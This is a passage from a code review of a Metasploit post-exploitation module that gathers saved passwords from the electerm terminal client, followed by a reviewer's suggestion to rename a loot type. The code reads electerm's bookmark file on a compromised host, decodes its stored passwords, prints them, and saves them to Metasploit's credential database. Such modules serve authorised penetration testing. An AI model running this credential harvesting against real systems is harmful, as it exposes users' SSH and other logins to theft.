modules/post/multi/gather/electerm.rb

```diff
@@ -0,0 +1,192 @@
+      ((s.ord - i - 1 + 65536) % 65536).chr
+    end.join
+    return result
+  end
+
+  def print_and_save(all_result)
+    pw_tbl = Rex::Text::Table.new(
+      'Header' => 'electerm Password',
+      'Columns' => [
+        'Title',
+        'Type',
+        'Host',
+        'Port',
+        'Username',
+        'Password',
+        'Description',
+      ]
+    )
+    all_result.each do |value|
+      next if !value.key?('username') || !value.key?('password')
+
+      row = []
+      row << value['title'] || ''
+      row << value.fetch('type', 'ssh')
+      row << value['host'] || ''
+      row << value['port'] || ''
+      row << value['username'] || ''
+      row << value['password'] || ''
+      row << value['description'] || ''
+      pw_tbl << row
+      config = {
+        type: value['type'],
+        host: value['host'],
+        port: value['port'],
+        username: value['username'],
+        password: value['password']
+      }
+      electerm_store_config(config)
+    end
+    if pw_tbl.rows.count > 0
+      path = store_loot('host.electerm', 'text/plain', session, pw_tbl, 'electerm.txt', 'electerm Password')
+      print_good("Passwords stored in: #{path}")
+      print_good(pw_tbl.to_s)
+    end
+  end
+
+  def electerm_store_config(config)
+    service_data = {
+      address: config[:host],
+      port: config[:port],
+      service_name: config[:type],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      private_type: :password,
+      private_data: config[:password],
+      username: config[:username]
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def parse_jsonlines(line)
+    result_hashmap = Hash.new
+    begin
+      result_hashmap = JSON.parse(line)
+    rescue ::JSON::ParserError => e
+      raise Error::ParserError, "[parse_bookmarks] #{e.class} - #{e}"
+    end
+    if result_hashmap.key?('password') && result_hashmap.key?('passwordEncrypted')
+      result_hashmap['password'] = dec_electrm_password(result_hashmap['password'])
+    end
+    return result_hashmap
+  end
+
+  def parse_json(bookmarks_path)
+    some_result = []
+    if session.platform == 'windows'
+      bookmarks_path.gsub!('/') { '\\' }
+    end
+    begin
+      if file_exist?(bookmarks_path)
+        nedb_data = read_file(bookmarks_path) || ''
+        print_error('The file could not be read') if nedb_data.empty?
+        nedb_data.each_line do |line|
+          some_result << parse_jsonlines(line)
+        end
+        credentials_config_loot_path = store_loot('electerm.creds', 'text/json', session, JSON.pretty_generate(some_result), bookmarks_path)
```

Comment:
Since the one above is `host.electerm` it seems like this should be `host.electerm.creds`. Either both should be prefixed with `host.` or neither should be prefixed with `host.`.
```suggestion
        credentials_config_loot_path = store_loot('host.electerm.creds', 'text/json', session, JSON.pretty_generate(some_result), bookmarks_path)
```